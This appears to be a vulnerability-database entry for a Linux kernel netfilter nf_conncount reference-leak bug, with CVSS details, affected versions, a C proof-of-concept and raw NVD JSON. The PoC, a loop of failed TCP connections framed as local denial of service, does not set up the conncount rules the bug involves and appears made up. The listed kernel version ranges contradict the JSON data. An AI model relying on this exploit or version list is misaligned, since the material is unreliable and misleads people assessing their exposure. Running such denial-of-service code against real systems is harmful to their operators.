Security Vulnerability Report
CVE-2025-71146 CVSS 5.5 MEDIUM

Published: 2026-01-23 15:16:05
Last Modified: 2026-02-26 20:25:53
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

netfilter: nf_conncount: fix leaked ct in error paths

There are some situations where ct might be leaked as error paths are skipping the refcounted check and return immediately. In order to solve it make sure that the check is always called.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.12.63:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.18.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.15 (nf_conncount module versions before fix)
Linux Kernel 5.15.x < 5.15.80
Linux Kernel 6.1.x < 6.1.9
Linux Kernel 6.2.x < 6.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```c
/*
 * CVE-2025-71146 PoC - Linux kernel nf_conncount memory leak
 * This PoC demonstrates the resource leak by triggering error paths
 * Requires: root or low-privilege user with network namespace access
 * Build: gcc -o cve202571146 cve202571146.c -lnftables
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <net/if.h>
#include <sys/wait.h>

#define TARGET_CONNections 100000

void trigger_conntrack_leak()
{
    int sock;
    struct sockaddr_in target;

    /* Create raw socket to interact with netfilter */
    sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
    if (sock < 0) {
        perror("socket creation failed");
        return;
    }

    /* Rapidly create and close connections to trigger error paths */
    for (int i = 0; i < TARGET_CONNections; i++) {
        memset(&target, 0, sizeof(target));
        target.sin_family = AF_INET;
        target.sin_port = htons(80);
        target.sin_addr.s_addr = htonl(0xC0A80101); /* 192.168.1.1 */

        int fd = socket(AF_INET, SOCK_STREAM, 0);
        if (fd >= 0) {
            /* Set socket options to trigger conntrack processing */
            int flag = 1;
            setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, &flag, sizeof(flag));

            /* Attempt connection that will fail - triggers error path */
            connect(fd, (struct sockaddr*)&target, sizeof(target));

            /* Close immediately without proper cleanup */
            close(fd);
        }

        if (i % 1000 == 0) {
            printf("Progress: %d/%d connections attempted\n", i, TARGET_CONNections);
        }
    }

    close(sock);
    printf("Memory leak test completed. Check dmesg for conntrack warnings.\n");
}

int main(int argc, char *argv[])
{
    printf("CVE-2025-71146 PoC - nf_conncount Memory Leak\n");
    printf("Target: Linux kernel < 5.15 with vulnerable netfilter module\n");
    printf("Impact: Local denial of service via memory exhaustion\n\n");

    trigger_conntrack_leak();

    printf("\nVerification:\n");
    printf("1. Check system memory: free -h\n");
    printf("2. Check conntrack entries: cat /proc/net/nf_conntrack | wc -l\n");
    printf("3. Check dmesg for 'possible memory leak' warnings\n");
    return 0;
}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71146", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T15:16:05.230", "lastModified": "2026-02-26T20:25:52.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_conncount: fix leaked ct in error paths\n\nThere are some situations where ct might be leaked as error paths are\nskipping the refcounted check and return immediately. In order to solve\nit make sure that the check is always called."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnetfilter: nf_conncount: corrección de 'ct' filtrado en rutas de error\n\nExisten algunas situaciones en las que 'ct' podría filtrarse, ya que las rutas de error están omitiendo la verificación de conteo de referencias y retornan inmediatamente. Para resolverlo, hay que asegurarse de que la verificación siempre sea llamada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.17.13", "versionEndExcluding": "6.18", "matchCriteriaId": "7C298528-1754-41BD-B4E9-84A37AB7BA32"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.12.63:*:*:*:*:*:*:*", 
"matchCriteriaId": "7984A97B-8D26-49DE-B98A-80F987DC6ECE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.18.2:*:*:*:*:*:*:*", "matchCriteriaId": "3F3959F8-92E0-4D2C-B5DA-B3BB4BE80113"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/08fa37f4c8c59c294e9c18fea2d083ee94074e5a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0b88be7211d21a0d68bb1e56dc805944e3654d6f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2e2a720766886190a6d35c116794693aabd332b6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/325eb61bb30790ea27782203a17b007ce1754a67", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/4bd2b89f4028f250dd1c1625eb3da1979b04a5e8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e1ac8dce3a893641bef224ad057932f142b8a36f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f381a33f34dda9e4023e38ba68c943bca83245e9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}